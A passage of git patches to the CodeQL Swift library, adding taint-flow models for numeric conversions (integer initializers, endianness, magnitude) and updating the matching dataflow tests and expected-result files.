conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:157:12:157:12 | v3 | result | -| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:158:12:158:12 | v3 | result | -| conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | -| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:174:13:174:13 | arr2 | result | -| conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | -| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:176:13:176:19 | ...[...] | result | -| conversions.swift:180:13:180:13 | arr1b | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:180:13:180:13 | arr1b | result | -| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:181:13:181:13 | arr2b | result | -| conversions.swift:182:13:182:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:182:13:182:20 | ...[...] | result | -| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:183:13:183:20 | ...[...] | result | -| conversions.swift:187:13:187:13 | arr1c | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:187:13:187:13 | arr1c | result | -| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:188:13:188:13 | arr2c | result | -| conversions.swift:189:13:189:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | -| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:190:13:190:20 | ...[...] | result | -| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:212:13:212:25 | .v | result | -| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:218:13:218:26 | .v | result | -| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:221:12:221:12 | self | result | -| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | result | -| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | result | +| conversions.swift:45:12:45:39 | call to Float.init(_:) | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | result | +| conversions.swift:46:12:46:40 | call to Double.init(_:) | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | result | +| conversions.swift:47:12:47:40 | call to String.init(_:) | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | result | +| conversions.swift:48:12:48:42 | .utf8 | conversions.swift:48:19:48:39 | call to sourceInt(_:) | conversions.swift:48:12:48:42 | .utf8 | result | +| conversions.swift:51:12:51:12 | arr | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:51:12:51:12 | arr | result | +| conversions.swift:52:12:52:17 | ...[...] | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:52:12:52:17 | ...[...] | result | +| conversions.swift:53:12:53:23 | call to Array.init(_:) | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:53:12:53:23 | call to Array.init(_:) | result | +| conversions.swift:54:12:54:26 | ...[...] | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:54:12:54:26 | ...[...] | result | +| conversions.swift:55:12:55:48 | call to Array.init(_:) | conversions.swift:55:20:55:42 | call to sourceString(_:) | conversions.swift:55:12:55:48 | call to Array.init(_:) | result | +| conversions.swift:56:12:56:51 | ...[...] | conversions.swift:56:20:56:42 | call to sourceString(_:) | conversions.swift:56:12:56:51 | ...[...] | result | +| conversions.swift:59:13:59:13 | v | conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | result | +| conversions.swift:63:12:63:12 | v2 | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:63:12:63:12 | v2 | result | +| conversions.swift:66:12:66:12 | v4 | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:66:12:66:12 | v4 | result | +| conversions.swift:75:12:75:12 | v7 | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:75:12:75:12 | v7 | result | +| conversions.swift:90:12:90:51 | ...! | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:51 | ...! | result | +| conversions.swift:91:12:91:54 | ...! | conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:54 | ...! | result | +| conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | result | +| conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | result | +| conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | conversions.swift:95:27:95:46 | call to sourceInt(_:) | conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | result | +| conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | result | +| conversions.swift:97:12:97:33 | .littleEndian | conversions.swift:97:12:97:31 | call to sourceInt(_:) | conversions.swift:97:12:97:33 | .littleEndian | result | +| conversions.swift:98:12:98:36 | .littleEndian | conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | conversions.swift:98:12:98:36 | .littleEndian | result | +| conversions.swift:99:12:99:33 | .bigEndian | conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | result | +| conversions.swift:100:12:100:36 | .bigEndian | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | result | +| conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | result | +| conversions.swift:137:12:137:40 | call to Float.init(_:) | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | result | +| conversions.swift:139:12:139:41 | call to String.init(_:) | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | result | +| conversions.swift:140:12:140:43 | .utf8 | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:43 | .utf8 | result | +| conversions.swift:141:12:141:43 | call to String.init(_:) | conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | result | +| conversions.swift:142:12:142:45 | .utf8 | conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | conversions.swift:142:12:142:45 | .utf8 | result | +| conversions.swift:143:12:143:42 | call to String.init(_:) | conversions.swift:143:19:143:41 | call to sourceDouble(_:) | conversions.swift:143:12:143:42 | call to String.init(_:) | result | +| conversions.swift:144:12:144:44 | .utf8 | conversions.swift:144:19:144:41 | call to sourceDouble(_:) | conversions.swift:144:12:144:44 | .utf8 | result | +| conversions.swift:146:12:146:40 | call to Float.init(_:) | conversions.swift:146:18:146:39 | call to sourceFloat(_:) | conversions.swift:146:12:146:40 | call to Float.init(_:) | result | +| conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:147:41:147:60 | call to sourceInt(_:) | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:148:57:148:78 | call to sourceFloat(_:) | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | result | +| conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:150:44:150:65 | call to sourceFloat(_:) | conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | result | +| conversions.swift:152:12:152:35 | .exponent | conversions.swift:152:12:152:33 | call to sourceFloat(_:) | conversions.swift:152:12:152:35 | .exponent | result | +| conversions.swift:153:12:153:35 | .significand | conversions.swift:153:12:153:33 | call to sourceFloat(_:) | conversions.swift:153:12:153:35 | .significand | result | +| conversions.swift:154:12:154:37 | .exponent | conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | conversions.swift:154:12:154:37 | .exponent | result | +| conversions.swift:155:12:155:37 | .significand | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | result | +| conversions.swift:156:12:156:36 | .exponent | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | result | +| conversions.swift:157:12:157:36 | .significand | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | result | +| conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | result | +| conversions.swift:166:12:166:43 | call to String.init(_:) | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | result | +| conversions.swift:175:12:175:12 | ms2 | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:175:12:175:12 | ms2 | result | +| conversions.swift:176:12:176:16 | .description | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:176:12:176:16 | .description | result | +| conversions.swift:177:12:177:16 | .debugDescription | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:177:12:177:16 | .debugDescription | result | +| conversions.swift:183:12:183:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:183:12:183:12 | parent | result | +| conversions.swift:184:12:184:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:184:12:184:12 | parent | result | +| conversions.swift:187:12:187:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:187:12:187:12 | v3 | result | +| conversions.swift:188:12:188:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:188:12:188:12 | v3 | result | +| conversions.swift:203:13:203:13 | arr1 | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | result | +| conversions.swift:204:13:204:13 | arr2 | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:204:13:204:13 | arr2 | result | +| conversions.swift:205:13:205:19 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | result | +| conversions.swift:206:13:206:19 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:206:13:206:19 | ...[...] | result | +| conversions.swift:210:13:210:13 | arr1b | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:210:13:210:13 | arr1b | result | +| conversions.swift:211:13:211:13 | arr2b | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:211:13:211:13 | arr2b | result | +| conversions.swift:212:13:212:20 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:212:13:212:20 | ...[...] | result | +| conversions.swift:213:13:213:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:213:13:213:20 | ...[...] | result | +| conversions.swift:217:13:217:13 | arr1c | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:217:13:217:13 | arr1c | result | +| conversions.swift:218:13:218:13 | arr2c | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:218:13:218:13 | arr2c | result | +| conversions.swift:219:13:219:20 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:219:13:219:20 | ...[...] | result | +| conversions.swift:220:13:220:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:220:13:220:20 | ...[...] | result | +| conversions.swift:236:13:236:13 | withUInt | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:236:13:236:13 | withUInt | result | +| conversions.swift:242:13:242:25 | .v | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:242:13:242:25 | .v | result | +| conversions.swift:248:13:248:26 | .v | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:248:13:248:26 | .v | result | +| conversions.swift:251:12:251:12 | self | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:251:12:251:12 | self | result | +| conversions.swift:255:13:255:25 | .v | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:255:13:255:25 | .v | result | +| conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | result | +| conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | | simple.swift:13:13:13:24 | ... .+(_:_:) ... | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | result | | simple.swift:14:13:14:24 | ... .-(_:_:) ... | simple.swift:14:17:14:24 | call to source() | simple.swift:14:13:14:24 | ... .-(_:_:) ... | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 0e6a9b75bcb..0be7309f857 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected @@ -1,17 +1,30 @@ testFailures | conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | -| conversions.swift:34:41:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | -| conversions.swift:58:16:59:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | -| conversions.swift:61:16:62:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | -| conversions.swift:69:51:70:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | -| conversions.swift:71:49:72:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | -| conversions.swift:72:52:73:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | -| conversions.swift:73:49:74:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | -| conversions.swift:74:59:75:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | -| conversions.swift:110:43:111:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | -| conversions.swift:130:47:131:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | -| conversions.swift:131:49:132:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | -| conversions.swift:166:45:167:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | -| conversions.swift:208:18:209:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | -| conversions.swift:232:47:233:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:34:40:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | +| conversions.swift:35:41:36:1 | // $ tainted=conv1-4\n | Missing result: tainted=conv1-4 | +| conversions.swift:36:41:37:1 | // $ tainted=conv1-5\n | Missing result: tainted=conv1-5 | +| conversions.swift:37:41:38:1 | // $ tainted=conv1-6\n | Missing result: tainted=conv1-6 | +| conversions.swift:39:40:40:1 | // $ tainted=conv1-8\n | Missing result: tainted=conv1-8 | +| conversions.swift:40:41:41:1 | // $ tainted=conv1-9\n | Missing result: tainted=conv1-9 | +| conversions.swift:41:43:42:1 | // $ tainted=conv1-10\n | Missing result: tainted=conv1-10 | +| conversions.swift:42:43:43:1 | // $ tainted=conv1-11\n | Missing result: tainted=conv1-11 | +| conversions.swift:43:43:44:1 | // $ tainted=conv1-12\n | Missing result: tainted=conv1-12 | +| conversions.swift:69:16:70:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | +| conversions.swift:72:16:73:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | +| conversions.swift:80:51:81:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | +| conversions.swift:82:54:83:1 | // $ tainted=conv3-8\n | Missing result: tainted=conv3-8 | +| conversions.swift:84:49:85:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | +| conversions.swift:85:52:86:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | +| conversions.swift:86:49:87:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | +| conversions.swift:87:52:88:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | +| conversions.swift:88:59:89:1 | // $ tainted=conv4-5\n | Missing result: tainted=conv4-5 | +| conversions.swift:89:62:90:1 | // $ tainted=conv4-6\n | Missing result: tainted=conv4-6 | +| conversions.swift:138:43:139:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | +| conversions.swift:158:47:159:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | +| conversions.swift:159:49:160:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | +| conversions.swift:160:44:161:1 | // $ tainted=conv9-9\n | Missing result: tainted=conv9-9 | +| conversions.swift:161:48:162:1 | // $ tainted=conv9-10\n | Missing result: tainted=conv9-10 | +| conversions.swift:196:45:197:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | +| conversions.swift:238:18:239:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | +| conversions.swift:262:47:263:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures diff --git a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift index 910ee45a526..e545c956220 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift +++ b/swift/ql/test/library-tests/dataflow/taint/core/conversions.swift @@ -31,10 +31,21 @@ typealias MyInt = Int func testConversions() { sink(arg: sourceInt("conv1-1")) // $ tainted=conv1-1 sink(arg: Int(sourceInt("conv1-2"))) // $ tainted=conv1-2 - sink(arg: UInt8(sourceInt("conv1-3"))) // $ tainted=conv1-3 - sink(arg: Float(sourceInt("conv1-4"))) // $ tainted=conv1-4 - sink(arg: String(sourceInt("conv1-5"))) // $ tainted=conv1-5 - sink(arg: String(sourceInt("conv1-6")).utf8) // $ tainted=conv1-6 + sink(arg: Int8(sourceInt("conv1-3"))) // $ tainted=conv1-3 + sink(arg: Int16(sourceInt("conv1-4"))) // $ tainted=conv1-4 + sink(arg: Int32(sourceInt("conv1-5"))) // $ tainted=conv1-5 + sink(arg: Int64(sourceInt("conv1-6"))) // $ tainted=conv1-6 + //sink(arg: Int128(sourceInt("conv1-7"))) --- doesn't build in test (yet) + sink(arg: UInt(sourceInt("conv1-8"))) // $ tainted=conv1-8 + sink(arg: UInt8(sourceInt("conv1-9"))) // $ tainted=conv1-9 + sink(arg: UInt16(sourceInt("conv1-10"))) // $ tainted=conv1-10 + sink(arg: UInt32(sourceInt("conv1-11"))) // $ tainted=conv1-11 + sink(arg: UInt64(sourceInt("conv1-12"))) // $ tainted=conv1-12 + //sink(arg: UInt128(sourceInt("conv1-13"))) --- doesn't build in test (yet) + sink(arg: Float(sourceInt("conv1-14"))) // $ tainted=conv1-14 + sink(arg: Double(sourceInt("conv1-15"))) // $ tainted=conv1-15 + sink(arg: String(sourceInt("conv1-16"))) // $ tainted=conv1-16 + sink(arg: String(sourceInt("conv1-17")).utf8) // $ tainted=conv1-17 let arr = [1, 2, sourceInt("conv2-1")] sink(arg: arr) // $ tainted=conv2-1 @@ -67,17 +78,26 @@ func testConversions() { sink(arg: v8) sink(arg: v8.advanced(by: 1)) sink(arg: v8.advanced(by: sourceInt("conv3-7"))) // $ tainted=conv3-7 + sink(arg: v8.distance(to: 1)) + sink(arg: v8.distance(to: sourceUInt64("conv3-8"))) // $ tainted=conv3-8 sink(arg: Int(exactly: sourceInt("conv4-1"))!) // $ tainted=conv4-1 sink(arg: UInt32(exactly: sourceInt("conv4-2"))!) // $ tainted=conv4-2 sink(arg: Int(clamping: sourceInt("conv4-3"))) // $ tainted=conv4-3 - sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-4"))) // $ tainted=conv4-4 - sink(arg: Int(sourceString("conv4-5"), radix: 10)!) // $ tainted=conv4-5 + sink(arg: UInt32(clamping: sourceInt("conv4-4"))) // $ tainted=conv4-4 + sink(arg: Int(truncatingIfNeeded: sourceInt("conv4-5"))) // $ tainted=conv4-5 + sink(arg: UInt32(truncatingIfNeeded: sourceInt("conv4-6"))) // $ tainted=conv4-6 + sink(arg: Int(sourceString("conv4-7"), radix: 10)!) // $ tainted=conv4-7 + sink(arg: UInt32(sourceString("conv4-8"), radix: 10)!) // $ tainted=conv4-8 sink(arg: Int(littleEndian: sourceInt("conv5-1"))) // $ tainted=conv5-1 - sink(arg: Int(bigEndian: sourceInt("conv5-2"))) // $ tainted=conv5-2 - sink(arg: sourceInt("conv5-3").littleEndian) // $ tainted=conv5-3 - sink(arg: sourceInt("conv5-4").bigEndian) // $ tainted=conv5-4 + sink(arg: UInt64(littleEndian: sourceUInt64("conv5-2"))) // $ tainted=conv5-2 + sink(arg: Int(bigEndian: sourceInt("conv5-3"))) // $ tainted=conv5-3 + sink(arg: UInt64(bigEndian: sourceUInt64("conv5-4"))) // $ tainted=conv5-4 + sink(arg: sourceInt("conv5-5").littleEndian) // $ tainted=conv5-5 + sink(arg: sourceUInt64("conv5-6").littleEndian) // $ tainted=conv5-6 + sink(arg: sourceInt("conv5-7").bigEndian) // $ tainted=conv5-7 + sink(arg: sourceUInt64("conv5-8").bigEndian) // $ tainted=conv5-8 let (q1, r1) = 1000.quotientAndRemainder(dividingBy: 2) sink(arg: q1) @@ -91,18 +111,26 @@ func testConversions() { sink(arg: q3) // $ MISSING: tainted=conv6-2 sink(arg: r3) // $ MISSING: tainted=conv6-2 + let (q4, r4) = UInt64(1000).quotientAndRemainder(dividingBy: sourceUInt64("conv6-3")) + sink(arg: q4) // $ MISSING: tainted=conv6-3 + sink(arg: r4) // $ MISSING: tainted=conv6-3 + let pair1 = 1000.addingReportingOverflow(2) sink(arg: pair1.0) // part sink(arg: pair1.1) // overflow - let pair2 = sourceInt("conv6-3").addingReportingOverflow(2) - sink(arg: pair2.0) // $ MISSING: tainted=conv6-3 + let pair2 = sourceInt("conv6-4").addingReportingOverflow(2) + sink(arg: pair2.0) // $ MISSING: tainted=conv6-4 sink(arg: pair2.1) - let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-4")) - sink(arg: pair3.0) // $ MISSING: tainted=conv6-4 + let pair3 = 1000.addingReportingOverflow(sourceInt("conv6-5")) + sink(arg: pair3.0) // $ MISSING: tainted=conv6-5 sink(arg: pair3.1) + let pair4 = UInt64(1000).addingReportingOverflow(sourceUInt64("conv6-6")) + sink(arg: pair4.0) // $ MISSING: tainted=conv6-6 + sink(arg: pair4.1) + // --- sink(arg: sourceFloat("conv7-1")) // $ tainted=conv7-1 @@ -129,6 +157,8 @@ func testConversions() { sink(arg: sourceDouble("conv9-6").significand) // $ tainted=conv9-6 sink(arg: sourceUInt("conv9-7").byteSwapped) // $ tainted=conv9-7 sink(arg: sourceUInt64("conv9-8").byteSwapped) // $ tainted=conv9-8 + sink(arg: sourceInt("conv9-9").magnitude) // $ tainted=conv9-9 + sink(arg: sourceUInt64("conv9-10").magnitude) // $ tainted=conv9-10 // --- From c2c23c872b63430471aa42240f2dcf1188c99887 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 15:06:24 +0000 Subject: [PATCH 0700/1267] Swift: Address some modelling issues for Swift 6. --- .../frameworks/StandardLibrary/Numeric.qll | 13 +- .../dataflow/taint/core/LocalTaint.expected | 32 +++++ .../dataflow/taint/core/Taint.expected | 125 ++++++++++++++++++ .../dataflow/taint/core/TaintInline.expected | 28 ---- 4 files changed, 169 insertions(+), 29 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll index 093f51ad771..f3635b8125c 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Numeric.qll @@ -35,6 +35,17 @@ private class NumericSummaries extends SummaryModelCsv { ";BinaryInteger;true;formatted();;;Argument[-1];ReturnValue;taint", ";BinaryInteger;true;formatted(_:);;;Argument[-1];ReturnValue;taint", ";BinaryInteger;true;quotientAndRemainder(dividingBy:);;;Argument[-1..0];ReturnValue.TupleElement[0,1];taint", + ";BinaryInteger;true;advanced(by:);;;Argument[-1..0];ReturnValue;taint", + ";BinaryInteger;true;distance(to:);;;Argument[-1..0];ReturnValue;taint", + ";SignedInteger;true;init(_:);;;Argument[0];ReturnValue;taint", + ";SignedInteger;true;init(exactly:);;;Argument[0];ReturnValue.OptionalSome;value", + ";UnsignedInteger;true;init(_:);;;Argument[0];ReturnValue;taint", + ";UnsignedInteger;true;init(exactly:);;;Argument[0];ReturnValue.OptionalSome;value", + ";FixedWidthInteger;true;init(_:);;;Argument[0];ReturnValue;taint", + ";FixedWidthInteger;true;init(clamping:);;;Argument[0];ReturnValue;taint", + ";FixedWidthInteger;true;init(truncatingIfNeeded:);;;Argument[0];ReturnValue;taint", + ";FixedWidthInteger;true;init(bitPattern:);;;Argument[0];ReturnValue;taint", // actually implemented in Int, UInt, Double etc. + ";FixedWidthInteger;true;init(truncating:);;;Argument[0];ReturnValue;taint", // actually implemented in Int, UInt, Double etc. ";FixedWidthInteger;true;init(_:radix:);;;Argument[0];ReturnValue.OptionalSome;taint", ";FixedWidthInteger;true;init(littleEndian:);;;Argument[0];ReturnValue;taint", ";FixedWidthInteger;true;init(bigEndian:);;;Argument[0];ReturnValue;taint", @@ -92,7 +103,7 @@ private class NumericFieldsInheritTaint extends TaintInheritingContent, className = "BinaryInteger" and fieldName = "words" or - className = "Numeric" and + className = ["Numeric", "SignedInteger", "UnsignedInteger"] and fieldName = ["magnitude", "byteSwapped"] or className = "BinaryFloatingPoint" and diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index a25101527f5..f73a66fa761 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected @@ -17,6 +17,16 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to Self.init(_:) | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | @@ -51,9 +61,11 @@ | conversions.swift:68:6:68:6 | 